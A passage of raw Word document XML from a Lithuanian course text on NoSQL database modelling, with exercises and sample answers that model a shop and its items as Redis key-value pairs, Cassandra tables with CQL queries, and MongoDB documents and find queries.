          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="940" w:name="_Toc10444020"/>
      <w:bookmarkStart w:id="941" w:name="_Toc13095567"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="942" w:name="_Toc13833461"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Pateikti nereliacinės (NoSQL) duomenų bazės schemą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="940"/>
      <w:bookmarkEnd w:id="941"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="942"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="943" w:name="_Toc10444021"/>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PATEIKITE KEY-VALUE DUOMENŲ BAZĖS MODELĮ PARDUOTUVEI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00073C2B">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Į</w:t>
      </w:r>
      <w:r w:rsidR="00073C2B" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>vertinkite, kaip saugoti sudėtinius raktus, kaip saugoti reikšmes, ryšius tarp prekių ir parduotuvės</w:t>
      </w:r>
      <w:r w:rsidR="006E1A90">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Parduotuvės atveju, raktas – parduotuvės kodas. Reikšmę pasirinkti saugoti galima JSON, XML, Protobuf ar kitu viešai prieinamu formatu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prekių parduotuvėje atveju, raktas sudaromas sujungiant parduotuvės kodas su prekės kodu atskiriant jas skirtuku, pavyzdžiui brūkšniu (pvz.: V1-11559245), reikšmė kaip ir parduotuvės atveju, saugoma vienu iš plačiai prieinamų formatų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Rekomenduojama rinktis Redis duomenų bazę.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. PATEIKITE COLUMN FAMILY DUOME</w:t>
      </w:r>
      <w:r w:rsidR="005102FB" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NŲ MODELĮ PARDUOTUVĖS SCENARIJU</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="006E1A90">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Schema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>CREATE KEYSPACE shopspace WITH replication = {'class':'SimpleStrategy', 'replication_factor' : 1};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>CREATE TABLE shopspace.shops (code TEXT PRIMARY KEY, area INT, address TEXT);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>CREATE TABLE shopspace.items (shop_code TEXT, item_code INT, name TEXT, unit_weight DECIMAL, unit_price DECIMAL, count INT, PRIMARY KEY(shop_code, item_code));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">shopspace.items lentelės atveju particijos raktas parduotuvės kodas, rūšiavimo raktas – prekės kodas. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Užklausos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM shopspace.shops WHERE code = 'V1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT * FROM shopspace.items WHERE shop_code = 'V1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT count FROM shopspace.items WHERE shop_code = 'V1' AND item_code = 11;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. PARDUOTUVĖJE ATSIRADO NAUJAS REIKALAVIMAS – PAGAL PREKĖS KODĄ GAUTI PARDUOTUVIŲ, KURIOSE YRA ŠI PREKĖ, SĄRAŠĄ SU PREKĖS VIENETŲ SKAIČIUMI. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006E1A90" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kaip pakeisti duomenų bazės schemą ir darbo su ja užklausas šiam reikalavimui įgyvendinti?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kadangi Cassandra leidžia saugiai užklausas vykdyti tik pagal raktą. Sukuriame papildomą lentelę:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>CREATE TABLE shopspace.shopitems (item_code INT, shop_code TEXT, count INT, PRIMARY KEY(item_code, shop_code));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Tuomet užklausa atrodo taip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SELECT shop_code, count FROM shopspace.shopitems WHERE item_code = 257;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Įterpimas keičiasi vykdant įterpimą į abi lenteles BATCH sakinio pagalba. Pavyzdžiui:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>BEGIN BATCH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INSERT INTO shopspace.shopitems (item_code, shop_code, count) VALUES (45, 'V2', 2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>INSERT INTO shopspace.items (shop_code, item_code, name, unit_weight, unit_price, count) VALUES ('V2', 45, 'Skanioji Duona', 0.9, 1.2, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>APPLY BATCH;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Alternatyviai galima panaudoti antrinius indeksus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06"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SUMODELIUOKITE PARDUOTUVĖS SCENARIJŲ DOKUMENTŲ DUOMENŲ BAZĖJE</w:t>
      </w:r>
      <w:r w:rsidR="00A63683">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Priimtini sprendimai tiek su viena, tiek su keliomis kolekcijomis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pavyzdžiui sudedant į vieną kolekciją, parduotuvė su jos prekėmis galėtų atrodyti taip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  _id: “V1”,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  area: 2500,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  address: “Linkmenu g. 3, Vilnius”,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  items: [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">    { code: 11559245, name: “Skalsioji duona”, unit_weight: 1.2, unit_price: 1.7, count: 11 },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">     ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A63683">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYKITE ŠIAS UŽKLAUSAS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>db.getCollection('shops').find({_id: "V1"});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>db.getCollection('shops').find({_id: "V1"}, {items: 1});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>db.getCollection('shops').find({"items.code": 23});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
